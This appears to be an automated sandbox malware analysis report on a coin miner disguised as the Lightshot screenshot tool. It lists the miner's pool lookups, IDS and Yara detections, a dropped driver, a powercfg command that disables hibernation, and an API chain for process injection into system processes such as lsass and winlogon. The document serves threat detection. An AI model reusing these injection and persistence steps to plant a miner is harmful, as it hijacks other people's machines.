          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmp
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E85898DCE0 FindFirstFileExW,31_2_000001E85898DCE0
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140AE86DCE0 FindFirstFileExW,39_2_00000140AE86DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5CDCE0 FindFirstFileExW,40_2_00000195DD5CDCE0
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA4DCE0 FindFirstFileExW,41_2_000001160CA4DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10ADCE0 FindFirstFileExW,66_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C93DCE0 FindFirstFileExW,67_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA9854DCE0 FindFirstFileExW,68_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26531DCE0 FindFirstFileExW,69_2_000001D26531DCE0
          Source: global trafficTCP traffic: 192.168.2.5:57360 -> 1.1.1.1:53
          Source: global trafficTCP traffic: 192.168.2.5:53943 -> 162.159.36.2:53
          Source: Joe Sandbox ViewIP Address: 141.94.96.71 141.94.96.71
          Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
          Source: Network trafficSuricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.5:63299 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49704 -> 141.94.96.71:80
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286173867.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://3csp.icrosof4m/ocp0
          Source: lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRoot
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: lsass.exe, 00000027.00000002.3285471454.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076618442.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2226134775.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
          Source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: Lightshot.exe, 00000024.00000003.2104682850.000001E0A9560000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: lsass.exe, 00000027.00000002.3285471454.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076618442.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2226134775.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: lsass.exe, 00000027.00000002.3285471454.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076618442.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2226134775.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283620680.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283620680.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 00000027.00000000.2076104919.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283163976.00000140AD850000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285471454.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076618442.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076187605.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2226134775.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3285141600.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286799841.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000003.2496096162.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: lsass.exe, 00000027.00000000.2076104919.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283163976.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2077023394.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3287070397.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076818301.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076554645.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://172.94.1q
          Source: dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: dialer.exe PID: 4508, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Uses powercfg.exe to modify the power settings
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeCode function: 0_2_00007FF7EB901394 NtSetSystemPowerState,0_2_00007FF7EB901394
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,25_2_00000001400010C0
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E8589828C8 NtEnumerateValueKey,NtEnumerateValueKey,31_2_000001E8589828C8
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 36_2_00007FF7B1C81394 NtOpenKeyTransacted,36_2_00007FF7B1C81394
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140AE86202C NtQuerySystemInformation,StrCmpNIW,39_2_00000140AE86202C
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140AE86253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,39_2_00000140AE86253C
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA428C8 NtEnumerateValueKey,NtEnumerateValueKey,41_2_000001160CA428C8
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,62_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001394 NtQueryInformationProcess,64_2_0000000140001394
          Source: C:\ProgramData\Screenshots\Lightshot.exeFile created: C:\Windows\TEMP\yycjbdwxjaoe.sysJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_bzsopdsf.pqc.ps1
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeCode function: 0_2_00007FF7EB9065EC0_2_00007FF7EB9065EC
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeCode function: 0_2_00007FF7EB9065EC0_2_00007FF7EB9065EC
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeCode function: 0_2_00007FF7EB9065EC0_2_00007FF7EB9065EC
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeCode function: 0_2_00007FF7EB9065EC0_2_00007FF7EB9065EC
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000226C25_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400014D825_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_000000014000256025_2_0000000140002560
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E858951F2C31_2_000001E858951F2C
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E8589638A831_2_000001E8589638A8
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E85895D0E031_2_000001E85895D0E0
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E858982B2C31_2_000001E858982B2C
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E8589944A831_2_000001E8589944A8
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E85898DCE031_2_000001E85898DCE0
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E8589B1F2C31_2_000001E8589B1F2C
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E8589C38A831_2_000001E8589C38A8
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E8589BD0E031_2_000001E8589BD0E0
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 36_2_00007FF7B1C865EC36_2_00007FF7B1C865EC
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 36_2_00007FF7B1C865EC36_2_00007FF7B1C865EC
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 36_2_00007FF7B1C865EC36_2_00007FF7B1C865EC
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 36_2_00007FF7B1C865EC36_2_00007FF7B1C865EC
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140ADFC1F2C39_2_00000140ADFC1F2C
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140ADFCD0E039_2_00000140ADFCD0E0
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140ADFD38A839_2_00000140ADFD38A8
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140AE86DCE039_2_00000140AE86DCE0
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140AE8744A839_2_00000140AE8744A8
          Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000140AE862B2C39_2_00000140AE862B2C
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD59D0E040_2_00000195DD59D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5A38A840_2_00000195DD5A38A8
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD591F2C40_2_00000195DD591F2C
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5CDCE040_2_00000195DD5CDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5D44A840_2_00000195DD5D44A8
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5C2B2C40_2_00000195DD5C2B2C
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA11F2C41_2_000001160CA11F2C
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA1D0E041_2_000001160CA1D0E0
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA238A841_2_000001160CA238A8
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA42B2C41_2_000001160CA42B2C
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA4DCE041_2_000001160CA4DCE0
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CA544A841_2_000001160CA544A8
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_000000014000226C62_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_00000001400014D862_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_000000014000256062_2_0000000140002560
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_000000014000315064_2_0000000140003150
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_00000001400026E064_2_00000001400026E0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10838A866_2_00000257E10838A8
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E107D0E066_2_00000257E107D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E1071F2C66_2_00000257E1071F2C
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10B44A866_2_00000257E10B44A8
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10ADCE066_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10A2B2C66_2_00000257E10A2B2C
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C1E38A867_2_000001F28C1E38A8
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C1DD0E067_2_000001F28C1DD0E0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C1D1F2C67_2_000001F28C1D1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C9444A867_2_000001F28C9444A8
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C93DCE067_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C932B2C67_2_000001F28C932B2C
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA97FD1F2C68_2_000001CA97FD1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA97FDD0E068_2_000001CA97FDD0E0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA97FE38A868_2_000001CA97FE38A8
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA98542B2C68_2_000001CA98542B2C
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA9854DCE068_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA985544A868_2_000001CA985544A8
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D2652F38A869_2_000001D2652F38A8
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D2652ED0E069_2_000001D2652ED0E0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D2652E1F2C69_2_000001D2652E1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D2653244A869_2_000001D2653244A8
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26531DCE069_2_000001D26531DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26532AEC269_2_000001D26532AEC2
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D265312B2C69_2_000001D265312B2C
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\yycjbdwxjaoe.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: String function: 00007FF7B1C81394 appears 33 times
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeCode function: String function: 00007FF7EB901394 appears 33 times
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
